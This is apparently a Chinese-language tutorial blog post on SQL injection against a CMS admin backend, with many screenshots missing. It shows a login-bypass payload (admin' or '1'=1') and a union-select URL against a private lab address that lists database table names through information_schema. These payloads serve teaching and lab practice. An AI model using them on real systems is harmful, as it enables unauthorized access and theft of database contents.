万能用户名和联合查询cms网站后台

1.万能用户名    单引号是以为mysql语句 

admin' or '1'=1'

admin的'是和后台语句的用户'  ' 这个想对应 

or 或     前面执行是错的   后面1=1 一定是对的  然后or是满足一个条件就对了 

这个是mysql语句拼接 

 and 必须是两个条件都相同 

源代码位置

万能用户名和联合查询cms网站后台_第1张图片

万能用户名和联合查询cms网站后台_第2张图片

 

2.cms框架平台 

1.查看有没有注入位置  (也就是交互位置) 收集信息 

1.

万能用户名和联合查询cms网站后台_第3张图片

 2.

万能用户名和联合查询cms网站后台_第4张图片

 

万能用户名和联合查询cms网站后台_第5张图片

 万能用户名和联合查询cms网站后台_第6张图片

 2.注入点利用 

1.发现行数

万能用户名和联合查询cms网站后台_第7张图片

 2.查看可不可以使用注入点

数据库报错  有’这个'这个说明是数字型 "" 字符型 

万能用户名和联合查询cms网站后台_第8张图片

 

判断列数

万能用户名和联合查询cms网站后台_第9张图片

 

注入使用(漏洞)

现在查看一下他的列数 和行数 让id出错 

万能用户名和联合查询cms网站后台_第10张图片

查找位置   

 回显位置

  查看数据库 

万能用户名和联合查询cms网站后台_第11张图片

 

查看数据表 hex  是16进制查看表 

http://192.168.199.161/cms/show.php?id=35%20and%201=2%20%20union%20select%201,2,3,4,5,6,7,8,9,10,hex(table_name),12,13,14,15%20from%20information_schema.tables%20where%20table_schema=database()万能用户名和联合查询cms网站后台_第12张图片

查看数据表  

万能用户名和联合查询cms网站后台_第13张图片 

 

查看列 

万能用户名和联合查询cms网站后台_第14张图片

 

查看

万能用户名和联合查询cms网站后台_第15张图片

 

你可能感兴趣的:(网络安全)